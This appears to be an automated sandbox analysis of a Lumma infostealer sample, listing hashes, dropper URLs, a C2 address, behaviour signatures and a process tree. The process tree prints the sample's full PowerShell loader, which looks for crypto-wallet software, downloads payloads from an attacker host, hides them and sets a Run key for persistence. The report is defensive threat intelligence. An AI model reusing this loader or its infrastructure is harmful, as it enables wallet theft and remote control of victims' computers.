Analysis

  • max time kernel
    115s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 15:17

General

  • Target

    Set-up.exe

  • Size

    5.5MB

  • MD5

    537915708fe4e81e18e99d5104b353ed

  • SHA1

    128ddb7096e5b748c72dc13f55b593d8d20aa3fb

  • SHA256

    6dc7275f2143d1de0ca66c487b0f2ebff3d4c6a79684f03b9619bf23143ecf74

  • SHA512

    9ceaaf7aa5889be9f5606646403133782d004b9d78ef83d7007dfce67c0f4f688d7931aebc74f1fc30aac2f1dd6281bdadfb52bc3ea46aca33b334adb4067ae2

  • SSDEEP

    49152:ERUl697ngPTrho9J8kgdjbHNZ5PP/Re5m3mxVN6KEp0v7J7k66ZRkQTXw+sljVop:uAXqnhON8m3mzNHTdw6YSX+sleu5y

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://mindfusteps.shop/minz/m4nd.zip

exe.dropper

https://mindfusteps.shop/minz/m2nd.zip

exe.dropper

https://mindfusteps.shop/minz/m3nd.zip

exe.dropper

https://mindfusteps.shop/minz/m1nd.zip

exe.dropper

https://mindfusteps.shop/mind/

Extracted

Family

lumma

C2

https://mindfuljournal.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Set-up.exe
    "C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:1852
    • C:\Windows\SysWOW64\more.com
      C:\Windows\SysWOW64\more.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"
          4⤵
          • Blocklisted process makes network request
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3248
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc $ e d H H f = ' h K c U : \ s o f t W a R e \ c l a S s e s \ ' ;   $ w A a j = $ e n V : L O c A l a P p D A t a + ' \ p R O g r A M S \ ' ;   $ 9 v x n 5 = ( G E T - W m I o B j E c T   - C L a s S   W i N 3 2 _ C o m p U t e r S Y s t E m ) . p A R T O f d O M A I N ;   $ V v p S = 0 ;   $ V 4 t o n = ' c : \ P r o G r A M   F i L e s \ ' ;   $ r 5 S u i = ' H K L M : \ S O f t w a R E \ c L A s S E S \ ' ;   $ E k Q d = ' h k C U : \ s O f t W A r E \ ' ;   $ Y M c z = @ (   $ v 4 t O N + ' b I T b O x \ b I t b o x . E X E ' ;   $ W A a j + ' C Y p h E r o C K   C Y S y N C \ C y p H e R O C K   C Y s y n C . E X e ' ;   $ E d H h f + ' k E e p k e Y ' ;   $ W A a J + ' k E E v O - W a L l e T \ K E E v O   l i n K . e X e ' ;   $ V 4 T o N + ' l e D g e r   l I V e \ L e d g e R   l I v e . E x e ' ;   $ e k Q d + ' b I T B o X a p P ' ;   $ w A A j + ' T R E Z O R   S U i T e \ T R E z o r   S U I T E . e X E ' ;   $ w a a j + ' R a b B y - d E S K t O p \ r A b B y   D e s K T o p . E X E ' ;   $ E K q d + ' m I c R o S o f T \ W i N D O w S \ c u R R e N t V E r s i O n \ u N i n s t A L L \ B i t b o X A P P ' ;   $ R 5 s U I + ' l E d g e R l i V E ' ;   $ E D h H f + ' a o p p ' ;   $ E D h H F + ' T R e Z O r s U I t E ' ;   $ v 4 T o N + ' b C   V A U L t \ B c V a U L T . E X e ' ;   $ r 5 S u I + ' B C v a u l t ' ;   $ W a a j + ' K e e p K e Y - D E S k t O P \ K E E p k E y   D e s k T o P . e x E ' ;   $ E K q D + ' r E A L   s e c u r i t Y \ b C v a u L t ' ;   $ E d h h F + ' K e E V O ' ;   $ E D H h F + ' L i Q U i d n e t W o r k ' ;   $ E d H H F + ' C Y P h E r O C K ' ;   $ e D H H F + ' o n E k E Y - w A l l e T ' ;   $ v 4 t o N + ' B L o c k S T r e a m \ b l O C K S t r e A M   g r E E n \ B L o C K S t R e a M   G R E e n . e X e ' ;   $ V 4 t O N + ' O n e K E Y \ o n E k e y . e x e ' ;   ) ;   $ h N o z = $ Y m C Z . l E N G T h ;   i F   ( $ 9 v x N 5 )   { $ v v p S = 1 }   E L s e   {   f o r   ( $ M 9 p w A = 0 ;   $ m 9 P w a   - L t   $ H N O z   - a N D   $ v V P S   - E q   0 ;   $ M 9 P w a + + )   {   I F   ( t E s T - p a t h   $ y M C Z [ $ m 9 P w a ] )   { $ V v P s = 1 } ; } ; } ;   I f   ( $ v v p s   - e q   1 )   {   C h d i R   $ E n v : A P P d A T a ;   $ R R R E e f H G = g e t - c O m m a n D   E x p A n D - a R C H I v E   - E R r O R A c t I o n   s i L E N T l y c O N t I n U E ;   $ t l e Q r Y = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 4 n d . z i p ' ;   $ V j r F t C g G = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 2 n d . z i p ' ;   $ b E z g j v Q I = ' v d f o r 4 h q . z i p ' ;   $ y X C P e M Q R = G C M   S t a R t - b i t s T R A n S f E R   - E r R o R a C T I O N   s i L e N T l y C O n t I N U e ;   $ 8 G Q 9 n t = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 3 n d . z i p ' ;   $ 8 T g q 3 E 5 = ' 3 q o 3 F c O . z i p ' ;   $ g G B D r n l = ' S m a r t D e f r a g T o o l ' ;   $ J f C i n G = ' 1 a K H x P B . z i p ' ;   [ N e t . s e r v i c e p O I N T m A N a G e r ] : : S E c U R i T y P r O t o C O l   =   [ N e t . S e c U r i T y p r O t o c o l t Y P e ] : : t L s 1 2 ;   $ u F G 9 b 7 j z = ' m A L l Q A . z i p ' ;   $ b 8 7 N 9 u = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 1 n d . z i p ' ;   $ U p x e w 6 F = " $ e N V : a P P D A t a \ $ 8 T g q 3 E 5 " ;   $ t j e 6 g 3 = $ E N V : a p P d A t A ,   $ b E z g j v Q I   - j o i N   ' \ ' ;   $ 3 s U H E X o = " $ E N v : a P P d a T a \ $ J f C i n G " ;   $ 4 5 Y J W y B = " { 0 } \ { 1 } "   - f   $ E N v : a P P d a T a ,   $ u F G 9 b 7 j z ;   $ A r M X I r Y v = " b i t s a D m I N . e X e   / T r A n s f E r   6 D r y 6 h p o   / D O w n l O A D   / P R i O r I T Y   n o R M a l   $ V j r F t C g G   $ U p x e w 6 F " ;   $ 1 m p h u T S i = " $ E n V : a p p D a t A \ $ g G B D r n l " ;   $ C K g l d V = " b i T S A d m i N . E x E   / t R a N s f e r   0 m 1 Y s L 7   / d O w n L o A d   / P r I o r I T Y   N o R m A l   $ 8 G Q 9 n t   $ t j e 6 g 3 " ;   $ u E x Z 6 R P D = ' b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   ' + $ b 8 7 N 9 u + '   ' + $ 3 s U H E X o ;   $ p F 7 H 5 J U = " b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   { 0 }   { 1 } "   - f   $ b 8 7 N 9 u ,   $ 4 5 Y J W y B ;   I f   ( $ R R R E e f H G )   {   I F   ( $ y X C P e M Q R )   {   S t a r t - B I T S t r a N S f e R   - S o U r c e   $ V j r F t C g G   - D e s t I n A t I O n   $ U p x e w 6 F ;   s T a r t - B I T s t R A N S F E R   - s O u R c E   $ 8 G Q 9 n t   - d E S T i n A T i o n   $ t j e 6 g 3 ;   s T A r t - b I T S t r A N S f E R   - s o U r c E   $ b 8 7 N 9 u   - D E s T I N a t I O N   $ 3 s U H E X o ;   s T A R T - B i T s t R a n S F E r   - s O u R c E   $ t l e Q r Y   - D E s T i n a t i o N   $ 4 5 Y J W y B ;   }   E l S E   { i E X   - c o m m a N D   $ u E x Z 6 R P D ;   I E X   - C o m m A n D   $ p F 7 H 5 J U ;   i e x   - c o m m a n d   $ A r M X I r Y v ;   &   $ C K g l d V ;   }   E x p A N D - A r c h i V e   - P A T h   $ 4 5 Y J W y B   - D e S t I N a T I o n P a t h   $ 1 m p h u T S i ;   E x p A N D - a R c h i V E   - P a t H   $ t j e 6 g 3   - d e s t i n a T I o N p a t h   $ 1 m p h u T S i ;   E x P A N d - A R C H i v E   - p A t H   $ 3 s U H E X o   - d E S T i n a T i O N p A t H   $ 1 m p h u T S i ;   e x P A n d - A r C h i V e   - p a t h   $ U p x e w 6 F   - D e S T i n a t i o N p A t H   $ 1 m p h u T S i ;   R m   - P a T h   $ t j e 6 g 3 ;   R D   - p A T H   $ U p x e w 6 F ;   R D   - p A t H   $ 4 5 Y J W y B ;   r e M O v e - I t e m   - P A T h   $ 3 s U H E X o ;   }   E L S E   {   $ Z A P P f t = @ ( ' p c i c a p i . d l l ' ,   ' c l i e n t 3 2 . i n i ' ,   ' T C C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' n s k b f l t r . i n f ' ,   ' P C I C H E K . D L L ' ,   ' P C I C L 3 2 . D L L ' ,   ' c l i e n t 3 2 . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ) ;   n i   - P A T h   $ E n v : a P p d A t A   - n A m e   $ g G B D r n l   - i T e M T y P e   ' d i r e c t o r y ' ;   $ g 1 i 5 r x B = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n d / ' ;   I F   ( $ y X C P e M Q R )   {   $ Z A P P f t   |   F o R E A c h - O B j E C t   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = j O I N - p A t h   - P A t h   $ 1 m p h u T S i   - c H i l D P a T h   $ _ ;   s t a R t - b I T S t r a n S F E R   - s O u r C e   $ h E V T G u q o   - d E s T i n A T i o N   $ S M J K N P ;   } ; }   e L S E   {   $ Z A P P f t   |   f o R E a C H - o B J E C T   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = $ 1 m p h u T S i ,   $ _   - j O I N   ' \ ' ;   $ p R l r a a Z C = ' B i t S a d m I N . e x E   / t r A n S f E r   6 L P t 8 K 2 g   / d o W n l o A d   / P R I O R I T y   N O r M A L   ' + $ h E V T G u q o + '   ' + $ S M J K N P ;   I E X   - C o m m A n D   $ p R l r a a Z C ; } ;   } ;   } ;   $ y F h z F L = G I   $ 1 m p h u T S i   - f o r C e ;   $ y F h z F L . a T T R i b u t E s = ' H i d d e n ' ;   C h d i R   $ 1 m p h u T S i ;   $ X C U F g c q = " $ 1 m p h u T S i \ c l i e n t 3 2 . e x e " ;   N E W - I t E m p R o p e R T y   - P a t H   ' H K C u : \ s o F T w A R e \ M I C r o s o F t \ w i N D O W S \ c U R r E n T V E R s I O N \ r u n '   - n A m e   $ g G B D r n l   - v a l U e   $ X C U F g c q   - P r O P E r t y t y p e   ' S t r i n g ' ;   S t a r t - P R O C e S S   c l I E n t 3 2 . E X e ;   } ; 
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3260
        • C:\Users\Admin\AppData\Roaming\RDJUYV.pif
          "C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious use of WriteProcessMemory
          PID:4144
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            5⤵
              PID:4604
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4012

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      5315900105942deb090a358a315b06fe

      SHA1

      22fe5d2e1617c31afbafb91c117508d41ef0ce44

      SHA256

      e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7

      SHA512

      77e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • C:\Users\Admin\AppData\Local\Temp\13821335

      Filesize

      1013KB

      MD5

      f7b47df6923eabe96417f277c97f32bf

      SHA1

      b031c79c7b8a2585d6c1eff80674b09eca5fc154

      SHA256

      bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d

      SHA512

      54f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4

    • C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1

      Filesize

      332B

      MD5

      a93ef812fcdf3af24ff8b33a75d4992e

      SHA1

      b282892bd321a8709474f43d790d7e661edaa98f

      SHA256

      d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6

      SHA512

      272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuemf0qc.2fv.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\79AFBM.xlsx

      Filesize

      5.7MB

      MD5

      3c6d0866e54ab391bc09713fde4c9d38

      SHA1

      a1a4e9c067e3c85739e85fb45f7ecdb363bcf856

      SHA256

      ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682

      SHA512

      eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

    • C:\Users\Admin\AppData\Roaming\RDJUYV.pif

      Filesize

      921KB

      MD5

      3f58a517f1f4796225137e7659ad2adb

      SHA1

      e264ba0e9987b0ad0812e5dd4dd3075531cfe269

      SHA256

      1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

      SHA512

      acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

    • memory/1852-0-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/1852-10-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/1852-1-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

      Filesize

      2.0MB

    • memory/1852-8-0x0000000074563000-0x0000000074565000-memory.dmp

      Filesize

      8KB

    • memory/1852-9-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/3248-35-0x00000000748B0000-0x0000000075060000-memory.dmp

      Filesize

      7.7MB

    • memory/3248-37-0x0000000004F60000-0x0000000004F82000-memory.dmp

      Filesize

      136KB

    • memory/3248-54-0x0000000006460000-0x000000000647A000-memory.dmp

      Filesize

      104KB

    • memory/3248-27-0x00000000748BE000-0x00000000748BF000-memory.dmp

      Filesize

      4KB

    • memory/3248-28-0x0000000002960000-0x0000000002996000-memory.dmp

      Filesize

      216KB

    • memory/3248-91-0x00000000748B0000-0x0000000075060000-memory.dmp

      Filesize

      7.7MB

    • memory/3248-56-0x00000000748B0000-0x0000000075060000-memory.dmp

      Filesize

      7.7MB

    • memory/3248-36-0x0000000005130000-0x0000000005758000-memory.dmp

      Filesize

      6.2MB

    • memory/3248-55-0x00000000748BE000-0x00000000748BF000-memory.dmp

      Filesize

      4KB

    • memory/3248-53-0x0000000007770000-0x0000000007DEA000-memory.dmp

      Filesize

      6.5MB

    • memory/3248-38-0x0000000005760000-0x00000000057C6000-memory.dmp

      Filesize

      408KB

    • memory/3248-39-0x00000000057D0000-0x0000000005836000-memory.dmp

      Filesize

      408KB

    • memory/3248-51-0x0000000005FC0000-0x000000000600C000-memory.dmp

      Filesize

      304KB

    • memory/3248-49-0x0000000005940000-0x0000000005C94000-memory.dmp

      Filesize

      3.3MB

    • memory/3248-50-0x0000000005F10000-0x0000000005F2E000-memory.dmp

      Filesize

      120KB

    • memory/3260-84-0x0000000007520000-0x0000000007542000-memory.dmp

      Filesize

      136KB

    • memory/3260-85-0x0000000007BA0000-0x0000000008144000-memory.dmp

      Filesize

      5.6MB

    • memory/3260-83-0x0000000007550000-0x00000000075E6000-memory.dmp

      Filesize

      600KB

    • memory/4012-67-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-68-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-92-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-82-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-69-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-70-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4012-71-0x0000000000400000-0x00000000009BA000-memory.dmp

      Filesize

      5.7MB

    • memory/4192-18-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/4192-16-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/4192-15-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/4192-14-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

      Filesize

      2.0MB

    • memory/4192-12-0x0000000074550000-0x00000000747E1000-memory.dmp

      Filesize

      2.6MB

    • memory/4688-20-0x00000000003D0000-0x0000000000429000-memory.dmp

      Filesize

      356KB

    • memory/4688-21-0x0000000000BBF000-0x0000000000BC7000-memory.dmp

      Filesize

      32KB

    • memory/4688-25-0x00000000003D0000-0x0000000000429000-memory.dmp

      Filesize

      356KB

    • memory/4688-57-0x00000000003D0000-0x0000000000429000-memory.dmp

      Filesize

      356KB

    • memory/4688-19-0x00007FFC453F0000-0x00007FFC455E5000-memory.dmp

      Filesize

      2.0MB

    • memory/4688-29-0x0000000003D20000-0x0000000003D59000-memory.dmp

      Filesize

      228KB

    • memory/4688-30-0x0000000003D20000-0x0000000003D59000-memory.dmp

      Filesize

      228KB